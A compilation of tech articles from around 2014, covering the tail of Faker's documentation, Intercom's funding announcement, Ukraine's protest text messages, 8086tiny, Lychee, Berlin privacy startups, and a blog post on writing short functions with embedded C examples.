fake.uri() # http://www.parker.com/
fake.uriExtension() # .asp
fake.uriPage() # terms
fake.uriPath() # explore/list/app
fake.url() # http://dubuque.info/
fake.userName() # goodwin.edwin

faker.providers.Company:

fake.bs() # maximize end-to-end infrastructures
fake.catchPhrase() # Multi-tiered analyzing instructionset
fake.company() # Stanton-Luettgen
fake.companySuffix() # Group

faker.providers.DateTime:

fake.amPm() # AM
fake.century() # IX
fake.date() # 1985-02-17
fake.dateTime() # 1995-06-08 14:46:50
fake.dateTimeAD() # 1927-12-17 23:08:46
fake.dateTimeBetween() # 1999-08-22 22:49:52
fake.dateTimeThisCentury() # 1999-07-24 23:35:49
fake.dateTimeThisDecade() # 2008-01-27 01:08:37
fake.dateTimeThisMonth() # 2012-11-12 14:13:04
fake.dateTimeThisYear() # 2012-05-19 00:40:00
fake.dayOfMonth() # 23
fake.dayOfWeek() # Friday
fake.iso8601() # 2009-04-09T21:30:02
fake.month() # 03
fake.monthName() # April
fake.time() # 06:16:50
fake.timezone() # America/Noronha
fake.unixTime() # 275630166
fake.year() # 2002

faker.providers.Person:

fake.firstName() # Elton
fake.lastName() # Schowalter
fake.name() # Susan Pagac III
fake.prefix() # Ms.
fake.suffix() # V

faker.providers.Address:

fake.address() # 044 Watsica Brooks
 West Cedrickfort, SC 35023-5157
fake.buildingNumber() # 319
fake.city() # Kovacekfort
fake.cityPrefix() # New
fake.citySuffix() # ville
fake.country() # Monaco
fake.geo_coordinate() # 148.031951
fake.latitude() # 154.248666
fake.longitude() # 109.920335
fake.postcode() # 82402-3206
fake.secondaryAddress() # Apt. 230
fake.state() # Nevada
fake.stateAbbr() # NC
fake.streetAddress() # 793 Haskell Stravenue
fake.streetName() # Arvilla Valley
fake.streetSuffix() # Crescent

faker.providers.Lorem:

fake.paragraph() # Itaque quia harum est autem inventore quisquam eaque. Facere mollitia repudiandae
 qui et voluptas. Consequatur sunt ullam blanditiis aliquam veniam illum voluptatem.
fake.paragraphs() # ['Alias porro soluta eum voluptate. Iste consequatur qui non nam.',
 'Id eum sint eius earum veniam fugiat ipsum et. Et et occaecati at labore
 amet et. Rem velit inventore consequatur facilis. Eum consequatur consequatur
 quis nobis.', 'Harum autem autem totam ex rerum adipisci magnam adipisci.
 Qui modi eos eum vel quisquam. Tempora quas eos dolorum sint voluptatem
 tenetur cum. Recusandae ducimus deleniti magnam ullam adipisci ipsa.']
fake.sentence() # Eum magni soluta unde minus nobis.
fake.sentences() # ['Ipsam eius aut veritatis iusto.',
 'Occaecati libero a aut debitis sunt quas deserunt aut.',
 'Culpa dolor voluptatum laborum at et enim.']
fake.text() # Dicta quo eius possimus quae eveniet cum nihil. Saepe sint non nostrum.
 Sequi est sit voluptate et eos eum et. Pariatur non sunt distinctio magnam.
fake.word() # voluptas
fake.words() # ['optio', 'et', 'voluptatem']

Localization

faker.Factory can take a locale as an argument, to return localized data. If no localized provider is found, the factory falls back to the default locale (en_EN).

from faker import Factory
fake = Factory.create('it_IT')
for i in range(0,10):
 print fake.name()
# Elda Palumbo
# Pacifico Giordano
# Sig. Avide Guerra
# Yago Amato
# Eustachio Messina
# Dott. Violante Lombardo
# Sig. Alighieri Monti
# Costanzo Costa
# Nazzareno Barbieri
# Max Coppola

You can check available Faker locales in the source code, under the providers package. The localization of Faker is an ongoing process, for which we need your help. Don't hesitate to create localized providers for your own locale and submit a PR!
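At its core, a localized provider is a class whose formatter methods draw from locale-specific word lists. The sketch below illustrates that idea in plain Python, independent of faker itself; the class name and word lists are hypothetical (the sample names are taken from the it_IT output above):

```python
import random


class ItItPerson:
    """Toy it_IT person provider: formatters backed by locale word lists."""

    first_names = ["Elda", "Pacifico", "Yago", "Costanzo"]
    last_names = ["Palumbo", "Giordano", "Amato", "Costa"]

    def __init__(self, rng=None):
        # Accept an injectable RNG so results can be made reproducible.
        self.rng = rng or random.Random()

    def first_name(self):
        return self.rng.choice(self.first_names)

    def last_name(self):
        return self.rng.choice(self.last_names)

    def name(self):
        return self.first_name() + " " + self.last_name()


provider = ItItPerson()
print(provider.name())
```

Localizing a provider then amounts to swapping in the word lists for the target locale while keeping the formatter method names the same.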

Using from shell

In a Python environment with faker installed, you can use it with:

python -m faker [option] [*args]

[option]:

  • a formatter name, such as text or address: display the result of that fake
  • a Provider name, such as Lorem: display all of that provider's fakes

[*args]: pass values to the formatter (currently strings only)

$ python -m faker address
968 Bahringer Garden Apt. 722
Kristinaland, NJ 09890

Seeding the Generator

You may want to always get the same generated data - for instance, when using Faker for unit testing purposes. The generator offers a seed() method, which seeds the random number generator. Calling the same script twice with the same seed produces the same results.

from faker import Faker
fake = Faker()
fake.seed(4321)
print fake.name() # Margaret Boehm
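faker's formatters are ultimately driven by a pseudo-random number generator, so the determinism works like seeding Python's random module directly. A toy illustration of the same idea, where fake_name is a hypothetical stand-in for a real formatter:

```python
import random


def fake_name(rng):
    # Stand-in formatter: draws from fixed word lists like a real provider.
    first = rng.choice(["Margaret", "Elton", "Susan"])
    last = rng.choice(["Boehm", "Schowalter", "Pagac"])
    return first + " " + last


# Two generators seeded identically yield identical sequences.
a = random.Random(4321)
b = random.Random(4321)
print(fake_name(a) == fake_name(b))  # True
```

This is why seeding once at the top of a test suite is enough to make every subsequent formatter call reproducible.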

Tests

Run tests:

$ python setup.py test

or

$ python -m unittest -v faker.tests

Write documentation for providers:

$ python -m faker > docs.txt

License

Faker is released under the MIT Licence. See the bundled LICENSE file for details.

Credits

How a Silicon Valley outsider raised $30M in 30 months | Inside Intercom


Comments:"How a Silicon Valley outsider raised $30M in 30 months | Inside Intercom"

URL:http://insideintercom.io/silicon-valley-outsider-raised-30m-30-months/


I’m excited to announce today that we’ve raised a Series B round of $23M.

It was led by Bessemer, investors in iconic tech companies like LinkedIn, Yelp, Skype, Pinterest, Box, Twilio, Shopify, and many more, with participation by our Series A investors The Social+Capital Partnership. Ethan Kurzweil has joined the board alongside Mamoon, Des, and myself.

We founded Intercom 30 months ago. Before then, I was living in Ireland and knew very little about raising venture capital. We’ve now raised a total of $30M over three rounds. These are the lessons I’ve learned.

Aggressively expand your vision

One man’s Facebook is another man’s “online directory for colleges”—which is how Zuckerberg described his new service initially. In the defining days of any new category, there are dozens of people who happen upon the same fundamental idea. But very few have the capacity to see the true potential for it beyond the obvious.

Your vision is the ceiling for your company’s potential. You’ll never be a billion dollar business if you’re not deliberately working to get there. And in venture capital, it doesn’t make sense to invest in anyone who isn’t at least trying to build a business that size.

Intercom is our contribution to Internet innovation. Internet technologies are still catching up with how humans interact offline. The majority of progress in this space is on the consumer side—Facebook, WhatsApp, Snapchat, et al. Intercom is bringing this to business. It’s a seamless, lightweight way for the whole company to connect personally with their customers. The incumbents haven’t innovated in over a decade. In fact, the separate helpdesks, email marketing tools, feedback products, and CRMs have only become more complex. These disconnected services cannot provide a holistic view of the customer. And as a result, the customer’s experience is very disjointed. Our vision is to be at the center of all customer communication for all kinds of Internet business, which increasingly every business is becoming. We’re dedicated to going all the way with this.

Focus on engagement quality before engagement quantity

Startups talk a lot about traction as a measure of their potential. When they do, they roll out the biggest number they have—like the number of people who’ve blinked at their sign-up form. “Meaningful traction” might be something stronger—like an actual sign up. Yet that’s still missing the point. A better measure is engagement. How intensely are individuals or companies using your product?

Venture investors assess deals on the presumption that the vast majority of the market for the product is untapped, and that it’s extremely large. Otherwise it’s not a venture-stage opportunity with high growth potential. And so the number of customers or users you have will always be expected to be small in the grand scheme of things. However, you’ll need to show that those customers are highly engaged. That they’re extracting a lot of value. A small number of such data points—which for some companies could be as low as 10 customers—will help you demonstrate the potential that your product could have in the broader market.

We now have just under 2,000 paying companies—small teams like Circle and Visual.ly, and larger companies like Heroku and HootSuite—and annual revenue in the millions. But more importantly, 65% of our monthly active users log in to Intercom every week, and 35% of our weekly active users log in 5 days per week. And while we’ve a lot to improve, customer satisfaction is off the charts.

Hire out of your league

I’ve heard the idea many times that goes something like: “angel investors bet on people, seed investors bet on product, Series A investors bet on a business…” It’s true that at a higher valuation and raise amount, and with more time spent on the business, there will be increased expectation of progress. But what shouldn’t be drawn from this is any idea that team becomes less important, at any stage. Even public companies’ stock price is affected by investor confidence in the management—study the rise and fall in the price of Yahoo! and Apple since their changes in leadership, respectively.

Mamoon once said to me: “My hiring philosophy is aim high. Get people you think you can’t get. Shock people that you were able to get a certain person.” This is the only approach that results in a step-change in average talent amongst a team. The opposite is a plateau in team quality—getting bigger, but not better. Great people attract great people and companies who adopt a culture of always stretching to get the very best have been shown time and time again to be the most successful. Furthermore, experienced leaders build significantly bigger businesses—“the typical successful founder [has] at least 6-10 years of industry experience”.

We started 2013 with 13 people and finished with 47—all uniquely amazing in ways I’m surprised by daily. In May we announced we had hired ex-Google and Facebook manager Paul Adams, now our VP of Product. And I’m delighted to announce today that we’ve hired ex-PayPal and Yammer exec Mark Woolway as COO. Mark now runs finance, operations, legal, HR, recruiting, and administration, and has had a tremendous impact in only one month. He’s certainly out of my league—he’s worked for three CEOs in his career: Peter Thiel, Elon Musk, and David Sacks. For PayPal he helped raise over $200M in venture capital, led their IPO, and their eventual acquisition by eBay for $1.6B. He was Managing Director for Thiel’s hedge fund, Clarium Capital, at its peak worth $8B. And as Executive Vice President at Yammer, he raised $127M and led the deal in which Microsoft acquired the company for $1.2B. People like Mark make everyone up their game, and raise the bar for what success looks like. I’m thrilled to call him a colleague. And by the way, we’re looking for a whole lot more.

Know your strategy and find investors who believe in it

There are many things we call “technology companies” whose unique value is not in fact defined by technology. This does not take from their achievement or worth to the world, but it can be useful to think about in terms of your own business strategy. Groupon, for example, is a very valuable company, yet its innovation is in its business model. It’s a promotions company with a web site—nobody uses Groupon for their amazing tech. The same can be said for many businesses with incredible sales or marketing.

Intercom does not have an interesting business model. We charge money for people to use our product. And we do not have incredible sales or marketing. We have no salespeople and made our first marketing hire one month ago. What we do have is an innovative product. Something that people can’t get elsewhere which does unique things for them. All of our value is in this technology. And our double-digit monthly growth comes from people liking it and sharing it with their friends. Our company will become more valuable mostly by investing in product. Making it better for those who use it today, and allowing it to be used on more platforms, in more markets.

When you can articulate your general business strategy, it’s far easier to know which investors will be most excited by your deal, and to make your partnership with them a long-term success. Mamoon agreed from the start that the bulk of our capital should be spent on product. On a Sunday in late December, the day before I pitched the Bessemer partnership, I met Ethan for a coffee. I suspected since my first interaction with him that we were on the same page, but I really wanted to hear him say it… I asked: “So if we do this deal, what are the kinds of things you think we should spend the money on?” He said quickly: “Product! I don’t think for the next five years you’d want to stop investing aggressively in product.” The right investor won’t ever want you to be something you’re not, because they’re investing in you for who you are and what you believe in. That’s your strategy. It defines the opportunity and makes you far easier to bet on. I feel so fortunate to have investors who support our passion for simply making an amazing product.

Thanks

It’s fair to say that fundraising is a pseudo-achievement. It doesn’t in itself create value. That comes from what you spend the money on. Yet it’s worth celebrating because of what you really have achieved to be able to convince smart people to back you. Today I’m celebrating the hard work of my incredible co-founders and teammates, and the courage of our early seed and Series A investors. But most importantly I’m celebrating our customers who’ve supported us and paid for our product in its infantile state. Thank you, thank you, thank you. We do this for you.

Maybe the Most Orwellian Text Message a Government's Ever Sent | Motherboard


Comments:"Maybe the Most Orwellian Text Message a Government's Ever Sent | Motherboard"

URL:http://motherboard.vice.com/en_ca/blog/maybe-the-most-orwellian-text-message-ever-sent


Ukraine's protests, now under cellphone surveillance. Image: Wikimedia

“Dear subscriber, you are registered as a participant in a mass disturbance.”

That's a text message that thousands of Ukrainian protesters spontaneously received on their cell phones today, as a new law prohibiting public demonstrations went into effect. It was the regime's police force, sending protesters the perfectly dystopian text message to accompany the newly minted, perfectly dystopian legislation. In fact, it's downright Orwellian (and I hate that adjective, and only use it when absolutely necessary, I swear).

But that's what this is: it's technology employed to detect noncompliance, to home in on dissent. The NY Times reports that the "Ukrainian government used telephone technology to pinpoint the locations of cell phones in use near clashes between riot police officers and protesters early on Tuesday." Near. Using a cell phone near a clash lands you on the regime's hit list.

See, Kiev is tearing itself to shreds right now, but since we're kind of burned out on protests, riots, and revolutions at the moment, it's being treated as below-the-fold news. Somehow, the fact that over a million people are marching, camping out, and battling with Ukraine's increasingly authoritarian government is barely making a ripple behind such blockbuster news bits as bridge closures and polar vortexes. Yes, even though protesters are literally building catapults and wearing medieval armor and manning flaming dump trucks.

Hopefully news of the nascent techno-security state will turn some heads—it's right out of 1984, or, more recently, Elysium: technology deployed to "detect" dissent. Again, this tech appears to be highly arbitrary; anyone near the protest is liable to be labeled a "participant," as if targeting protesters directly and so broadly wasn't bad enough in the first place.

It's further reminder that authoritarian regimes are exploiting the very technology once celebrated as a vehicle for liberation; last year, in Turkey, you'll recall, the state rounded up dissident Twitter users. Now, Ukraine is tracing the phone signal directly. Dictators have already proved plenty adept at pulling the plug on the internet altogether.

All of this puts lie to the lately-popular mythology that technology is inherently a liberating force—with the right hack, it can oppress just as easily.

 

Reach this writer at brian.merchant(at)vice.com and on Twitter, at @bcmerchant

 

More Dystopian Drift:

With Unprecedented Inequality, the US Looks More Like a Dystopia Than Ever

Free the Network

Things Are Getting Orwellian at Exxon's Arkansas Oil Spill

Edward Snowden Says Our World Is Worse than '1984'

Unity Feedback - Platforms: Unity Editor for Linux


Comments:"Unity Feedback - Platforms: Unity Editor for Linux"

URL:http://feedback.unity3d.com/suggestions/platforms-unity-editor-for-linu


peniwize

Jan 22, 2014 17:13

I develop embedded gaming (slot) machines on Linux and I'm currently investigating Unity 3D (which is awesome, by the way). It's important for me to be able to use a native Unity editor on Linux since it's the only piece of software that binds me to either Windows or Mac, which significantly disrupts my work flow and slows my productivity. I would also love to be able to integrate Unity as a component of an executable INSTEAD of HAVING to use a generated executable and plugin(s) as this would SIGNIFICANTLY simplify my architecture. Anyway, PLEASE port the editor to Linux. Valve's work to support gaming on Linux and M$ going off the rails with Win 8/9 has created very strong motivation for game dev's to support Linux - and it's happening quickly. Us Linux gamers would LOVE to have Unity completely on board and along for the ride. Gaming is migrating to Linux. Embrace it. :-)

8086tiny: a tiny PC emulator/virtual machine - Home


Comments:"8086tiny: a tiny PC emulator/virtual machine - Home"

URL:http://www.megalith.co.uk/8086tiny/


About 8086tiny

8086tiny is a free, open source PC XT-compatible emulator/virtual machine written in C. It is, we believe, the smallest of its kind (the fully-commented source is under 25K). Despite its size, 8086tiny provides a highly accurate 8086 CPU emulation, together with support for PC peripherals including XT-style keyboard, floppy/hard disk, clock, and Hercules graphics. 8086tiny is powerful enough to run software like AutoCAD, Windows 3.0, and legacy PC games.

8086tiny is highly portable and runs on practically any little endian machine, from simple 32-bit MCUs upwards. 8086tiny has successfully been deployed on 32-bit/64-bit Intel machines (Windows, Mac OS X and Linux), Nexus 4/ARM (Android), iPad 3 and iPhone 5S (iOS), and Raspberry Pi (Linux).

The philosophy of 8086tiny is to keep the code base as small as possible, and through the open source license encourage individual developers to tune and extend it as per their specific requirements, adding support, for example, for more complex instruction sets (e.g. Pentium) or peripherals (e.g. mouse). Any questions, comments or suggestions are very welcome in our forum.

An obfuscated version of 8086tiny (condensed into just 4043 bytes of C code) was a winner of the 2013 IOCCC contest. Significant interest followed for a documented, commented, maintainable version. The result is the distribution presented here.

Feature Highlights

8086tiny's feature highlights include:

  • Highly accurate, complete 8086 CPU emulation (including undocumented features and behavior)
  • Support for all standard PC peripherals: keyboard, 3.5" floppy drive, hard drive, video (Hercules graphics and CGA color text mode, including direct video memory access), real-time clock, timers
  • Disk images are compatible with standard Windows/Mac/UNIX mount tools for simple interoperability
  • Complete source code provided (including custom BIOS)

8086tiny is highly portable, with minimal system requirements:

  • Minimal C runtime library support required (uses POSIX file I/O and time functions only - no memory management or string functions)
  • Uses SDL 1.2 for graphics, but can compile without SDL for text-only applications
  • Storage requirement: typically around 20KB for compiled binary, 9KB for BIOS image, and 720KB/1.44MB for floppy disk image
  • System RAM requirement: around 1.5MB

Applications

Some possible applications:

  • Run legacy PC software and games on modern hardware
  • Teach computer architecture and Intel assembly language in a safe, sandboxed environment
  • Deploy on Raspberry Pi to make the world's cheapest ($25) complete IBM-compatible PC
  • Extend the code base to develop a lean, modern-processor VM

If you develop an application that makes use of 8086tiny, and would like a link to it here, please get in touch.

License

8086tiny is free to use for any purpose, commercial or non-commercial, and is made available under a Creative Commons Attribution-ShareAlike 3.0 Unported License.

If 8086tiny brings you joy or profit, the author welcomes modest donations as a token of appreciation.

Lychee


Comments:"Lychee"

URL:http://lychee.electerious.com


Lychee 2.0 Photo-Management

Lychee is a free photo-management tool, which runs on your server or web-space. Installing is a matter of seconds. Upload, manage and share photos like from a native application. Lychee comes with everything you need and all your photos are stored securely.

Managing your photos has never been easier. Upload, move, rename, describe, delete or search your photos in seconds. All in one place, right from your browser.

Sharing like it should be. One click and every photo and album is ready for the public. You can also protect albums with passwords if you want. It's under your control.

Look at all your images in full-screen mode, navigate forward and backward by using your keyboard or let others enjoy your photos by making them public.

1. Upload your photos or create a new album for them.

2. See all the information from your photos.

3. Share your albums or photos with your favorite service.

4. Lychee looks and works perfectly on all your devices.

Lychee is completely open-source. Everyone can take advantage of the work we have already done and even improve it. We are open for every suggestion or help.

Your server, your data, your rules. Never depend on someone else. Lychee is a self-hosted solution, so you are in full control of your photos.

Our goal was to create a web app everyone can use. Lychee works intuitively and comes with a stunning, beautiful interface.

If you enjoy Lychee, please consider a little donation.

- or -

Eric S. Raymond - clang and FSF's strategy


AMD Debuts New 12- and 16-Core Opteron 6300 Series Processors | techPowerUp

Germany's Privacy Stance Boosts Berlin's Tech Startups - Forbes


Comments:"Germany's Privacy Stance Boosts Berlin's Tech Startups - Forbes"

URL:http://www.forbes.com/sites/alisoncoleman/2014/01/20/germanys-privacy-stance-boosts-berlins-tech-start-ups/


English: Berlin at night. Seen from the Allianz building in Treptow, showing the Universal building on the right at the river Spree and the TV-Tower at Alexanderplatz (Photo credit: Wikipedia)

With hundreds of millions of Euros invested in its tech start ups the city of Berlin is a hotspot for innovative entrepreneurs looking to create the next big thing. Among the savviest are those with their head around Germany’s preoccupation for privacy.

The country takes privacy very seriously, as Facebook discovered when it clashed with German data protection authorities over its facial recognition feature, deemed a violation of privacy laws. Google, too, fell foul of Germany’s stance on privacy when public opposition to its Google Maps Street View feature forced it to abandon the German branch of the project.

However, post NSA and PRISM, this stance is serving the tech sector well, with investors showing a healthy interest in firms that are innovating in the online security and privacy arenas.

To understand Germany’s attitude to privacy we need to delve into its history. The country pioneered data protection law, but as a symptom of its past, explains Berlin-based technology journalist David Meyer.

“Both the Nazis and the Stasi were very big on surveillance, and part of their legacy was to instil a deep appreciation for privacy among the German people,” he says.

The Google Maps debacle is an illustration of this. The public backlash against Street View forced Google to offer Germans the option of having their houses blurred out, and ultimately to give up, when the scale of the response rendered the proposal financially unviable.

Germany also has an unusually large number of hackers and security experts, possibly a throwback to the country’s engineering tradition and its history.

And it has some of the world’s toughest data protection laws, so start ups creating services for the local market will, by default, be meeting or exceeding data protection compliance requirements in other countries.

In the wake of the Snowden revelations, smart tech entrepreneurs have seized the opportunities this presents.

Among them is internet encryption services provider ZenGuard. Bootstrapped by its two founders last summer, the company recently secured accelerator investment and angel funding, and is now drawing attention from a global VC audience.

“The firm’s next round of funding will be with international investors, we want our international reach to be reflected in our investor consortium,” says co-founder and managing director Simon Specka.

ZenGuard has already established more than 70 servers in five locations across three continents. Clearly, while behaviour between markets may vary, the appetite for greater privacy protection amid unrestricted internet is global.

Berlin-based Blippex describes itself as a search engine ‘made by the people for the people’, built with user privacy in mind. With the option to anonymously provide data about the sites they visit and how long they spend there, users themselves are creating a search engine built on where real people are browsing, one that therefore delivers more relevant results.

Another new arrival in the city’s tech hub, Arriver is a social navigation tool developed on the principle of neutrality: privacy through product design and business model. It is designed for the mobile internet, a real place where people can be found in real life and in real time, as distinct from the virtual space of the internet.

Functions Should Be Short And Sweet, But Why?


Comments:"Functions Should Be Short And Sweet, But Why?"

URL:http://sam-koblenski.blogspot.ru/2014/01/functions-should-be-short-and-sweet-but.html


In my early days of programming, I would write functions good and long. Screen after screen of complicated logic and control structures would fill my coding projects with only a scant few mega functions dropped in to break things up a bit. It was years before things improved and I learned the value of splitting up those long stretches of coding logic into more manageable pieces. As I continue to improve as a programmer, I find that the functions I write keep getting shorter, more focused, and more numerous, and I keep seeing more benefits to this style of programming.

At first, the main barrier to small functions was likely the difficulty in learning to program in general. (By 'functions' I'm referring to all manner of parametrized blocks of code: functions and routines in procedural languages, methods in object-oriented languages, and lambdas and procedures in functional languages.) Functions are a hard concept to understand when they're first introduced, and to all appearances, it looks easier to write everything out in one long stream of logic. Getting the program to do what you want at all is hard enough, so why complicate things by having the execution path jump in and out of all kinds of functions as well? And once all of those chains of if-else statements and nested for loops are working, the last thing you want to do is change anything that could break it again.

Likely the most obvious value-add for functions becomes apparent when you start repeating code. Instead of copy-pasting those blocks of code, you can parametrize them into functions and reuse one block of code many times. The long road to the understanding of DRY has begun. Yet, you may resist breaking up your code into many more smaller functions because of the friction involved in doing so. After all, the code is working, and it seems like an awful lot of effort to refactor it all into functions of ten lines or less. Screen-length functions should be good enough, right?

Wrong. There are so many more benefits to writing short and sweet functions, but before getting into those benefits, let's look at an example that we can refer to.

An Example Command Interface


I've been writing a lot of embedded code in C/C++ over the last couple years, so examples in that vein come easily for me right now. For this example imagine you're implementing a command interface between a host processor and a slave processor that are connected over a serial communication protocol, like SPI or UART. A command packet will consist of a command, any associated parameters, and an optional block of data. The slave will receive command packets, process them, and reply with a response packet, or a simple acknowledgement if no response data is needed by the host. We'll keep it really simple and not allow the slave to initiate any commands.

When I first started programming, I might have implemented the slave's command processing as one massive function, and maybe broken off some repeated code blocks into functions after it was working. But that method of coding imposes a huge amount of cognitive overhead. It would be much simpler to start out with something like this:

void IntHandler() {
  HostCommand hostCmd = HOST_CMD_READ;
  IntDisable(INT_SPI0);
  SPIDataGet(SPI0_BASE, (unsigned long *)&hostCmd);
  HandleHostCommand(hostCmd);
  IntEnable(INT_SPI0);
}

This is the interrupt handler for when a SPI peripheral receives data over the serial interface and raises an interrupt in the slave processor. The function simply sets a default command, disables future interrupts, reads the command from the SPI peripheral, handles the command, and re-enables interrupts. The bulk of the work is done in the HandleHostCommand(hostCmd) function call, which looks like this:

void HandleHostCommand(HostCommand hostCmd) {
  switch (hostCmd)
  {
  case HOST_CMD_NOP:
    HandleNop();
    break;
  case HOST_CMD_READ:
    HandleRead();
    break;
  case HOST_CMD_SET_IP_ADDR:
    HandleSetIP();
    break;
  case HOST_CMD_SET_CHANNEL_CONFIG:
    HandleSetChannelConfig();
    break;
  /*
   * Many more commands and function calls.
   */
  default:
    HandleError();
    break;
  }
}

Again, this is a fairly straightforward function that focuses on one task - routing each incoming command to the function that will handle it. The implementation of each HandleXXX() function is equally simple. Here's the one for a NOP command:

void HandleNop() {
  SPIDataPut(SPI0_BASE, HOST_REPLY_POSACK);
}

This function is especially simple because it implements the no-operation command, which just echoes a positive acknowledgement back to the host processor. Other command handling functions will be more complicated, but not by much. I could go on with more functions, but I think you get the idea. So other than making the functions dead simple, what are the advantages to coding this way?
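To give a feel for a slightly more complicated handler, here is a sketch of a hypothetical HandleSetIP() that reads four parameter bytes and then acknowledges. The SPI functions and constants are stubbed out here so the sketch stands alone; the stubs, the fake byte stream, and the exact packet layout are my assumptions for illustration, not the article's actual implementation.

```c
/* Stubbed-out stand-ins for the SPI interface and constants used in the
 * article (the real functions talk to the hardware peripheral). */
#define SPI0_BASE 0
#define HOST_REPLY_POSACK 0x06

static unsigned long spi_rx[4] = {192, 168, 1, 10}; /* fake incoming bytes */
static int spi_rx_pos = 0;
static unsigned long spi_tx_last = 0;

static void SPIDataGet(int base, unsigned long *data) {
    (void)base;
    *data = spi_rx[spi_rx_pos++];
}

static void SPIDataPut(int base, unsigned long data) {
    (void)base;
    spi_tx_last = data;
}

static unsigned char ip_addr[4];

/* Hypothetical handler: read the four parameter bytes that follow a
 * HOST_CMD_SET_IP_ADDR command, store them, and acknowledge. */
void HandleSetIP(void) {
    for (int i = 0; i < 4; i++) {
        unsigned long byte;
        SPIDataGet(SPI0_BASE, &byte);
        ip_addr[i] = (unsigned char)byte;
    }
    SPIDataPut(SPI0_BASE, HOST_REPLY_POSACK);
}
```

Even this handler stays within one layer of abstraction: it moves bytes and acknowledges, and nothing more.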

Easier To Write


One of the incredible things about programming this way is that as you are writing, drilling down into each of these simple functions, you quickly realize where you can reuse one small function in another place. Even though it might seem like coding is a little slower to begin with, once you get a few levels deep in a complex task, all of a sudden you find that you're not writing as much logic. You're mostly calling functions you've already written, and the logic that you do still need to write is very straightforward.

Coding lots of smaller functions allows you to concentrate more easily on the task at hand instead of holding hundreds or thousands of lines of code in your head, and you can make good progress much more quickly and correctly. It also frees up mental resources for solving the more complicated problems in programming, which is what you really want to be spending your mental energy on.
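A tiny invented illustration of that kind of reuse (the helper and its values are hypothetical, not from the article): two former copy-paste sites collapse into one parametrized function.

```c
/* One parametrized helper replaces two copy-pasted clamping blocks that
 * each did their own "if too big / if too small" bookkeeping inline. */
static int clamp_percent(int value) {
    if (value < 0)   return 0;
    if (value > 100) return 100;
    return value;
}
```

Each former call site now reads as a single self-describing call, such as `cpu_load = clamp_percent(raw_load);`, and any future fix to the clamping logic happens in exactly one place.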

Easier To Read


Besides making code easier to write, lots of short functions make code much easier to read. That may be counter-intuitive, because you would think having so many functions with only a handful of lines in them would force you to jump around the code a lot more, searching for the implementation of this or that function. Most of the time that's not the case. More often than not, you're looking for a specific block of code to find and fix a bug or add a feature. Finding that code block is actually easier when you don't have to sift through hundreds of lines of irrelevant code in the same function, trying to decide if any of it influences the bug you're tracking down or if it will break when you make a change. Once you find the right code, it's already isolated in a nice self-contained package that's easy to understand and change.

Reading and understanding code is also aided by the focused nature of small functions. In the command interface above, the code in each function exists firmly within one layer of abstraction. Low-level peripheral interface code is not mixed with higher level decision or control structures, which in turn is not mixed with book-keeping code. It's the Single Responsibility principle applied to functions. The purpose of each function is immediately apparent, and that helps considerably when you have to come back to it in six months (or five years) to make a change. Not to mention the fact that small functions are much more portable, making changes even easier.

Easier To Test


Long functions are notoriously hard to test. Making sure all code paths are covered and the code is functionally correct becomes a nightmare. If you add in interactions with hardware peripherals, like the example above, things get even more difficult because simulating what the embedded hardware does for offline testing is a real challenge. But testing the code above is quite easy. The functions that interface directly with the hardware can be mocked without the need to maintain complicated state for long, involved tests because the functions that use the hardware interface are short and simple.

Coming up with tests for each function is also straightforward because none of them do very much. For example, the tests for HandleHostCommand() just need to pass in each command and a few invalid commands and make sure the correct function is called each time. Nothing could be simpler.
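Here's what such a test might look like, sketched with a trimmed-down dispatcher and recording stubs standing in for the real handlers. The enum values and the recording scheme are invented for illustration; only the dispatch shape comes from the article.

```c
/* A trimmed, self-contained version of the dispatcher, with each handler
 * replaced by a stub that records that it ran. A unit test then just
 * feeds in commands and checks which stub fired. */
typedef enum {
    HOST_CMD_NOP,
    HOST_CMD_READ,
    HOST_CMD_INVALID = 0xFF  /* hypothetical bad command for the test */
} HostCommand;

typedef enum { CALLED_NONE, CALLED_NOP, CALLED_READ, CALLED_ERROR } Called;
static Called last_called = CALLED_NONE;

static void HandleNop(void)   { last_called = CALLED_NOP; }
static void HandleRead(void)  { last_called = CALLED_READ; }
static void HandleError(void) { last_called = CALLED_ERROR; }

void HandleHostCommand(HostCommand hostCmd) {
    switch (hostCmd) {
    case HOST_CMD_NOP:  HandleNop();   break;
    case HOST_CMD_READ: HandleRead();  break;
    default:            HandleError(); break;
    }
}
```

Because the dispatcher does nothing but route, the whole test suite for it is a handful of one-line checks.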

Easier To Name Variables


One of the hardest problems in programming is naming variables, but when you drastically cut down the size of functions, naming becomes much easier because the amount of context that must be held in the variable name is smaller. If done right, variable names should get shorter as functions get shorter while their meaning becomes easier to understand and remember.

Imagine the complexity of the variable names that would be required if all of the command processing code was written in HandleHostCommand(). Command-specific variable names would quickly get out of hand, and there would be the unhealthy urge to reuse variables for multiple purposes. Both of those problems are neatly avoided by splitting the command processing into individual functions.

Easier To Self-Document


In Code Complete, Steve McConnell describes the Pseudocode Programming Process, where pseudocode is used to refine a routine until it reaches a point where it is easier to write the code than to write more pseudocode. Then the pseudocode is converted to comments and the code is written below each comment. Considering what I think of comments, McConnell didn't go far enough with his recommended process.

Each comment ends up redundantly describing the following code, making the comments essentially useless. Instead of writing code for each comment, coming up with a good function name and putting the code in the resulting functions would be a better approach. Then the code becomes more self-documenting, and the comments can either be removed to de-clutter the code or used as the function's documentation if necessary.
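A small invented example of that refactoring: the pseudocode comments ("validate the header", "verify the checksum") become function names, so the top-level function reads like the original pseudocode. The packet format here is hypothetical.

```c
/* Hypothetical packet: one magic header byte, payload bytes, and a final
 * XOR checksum byte. Each former pseudocode comment is now a function. */
static int header_is_valid(const unsigned char *pkt) {
    return pkt[0] == 0xAA;  /* magic byte check */
}

static unsigned char payload_checksum(const unsigned char *pkt, int len) {
    unsigned char sum = 0;
    for (int i = 1; i < len - 1; i++)  /* bytes between header and checksum */
        sum ^= pkt[i];
    return sum;
}

/* The top-level logic now self-documents: no comments needed to explain
 * what each step does, because the function names say it. */
int packet_is_well_formed(const unsigned char *pkt, int len) {
    return header_is_valid(pkt) &&
           payload_checksum(pkt, len) == pkt[len - 1];
}
```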

When code is structured with lots of small functions, the function names become a great way to describe what the code is doing directly in the code. Learning Ruby and Rails is making this advantage even more apparent to me. The omission of most parentheses in Ruby makes the code so easily readable that small functions are much more common and comments are used far less frequently. Most of that advantage can be carried over to other languages, and at least in the example above, comments wouldn't add much value to the code while increasing its verbosity considerably. That's not to say that comments should never be used, but their necessity is drastically reduced.

Make Your Life Easier


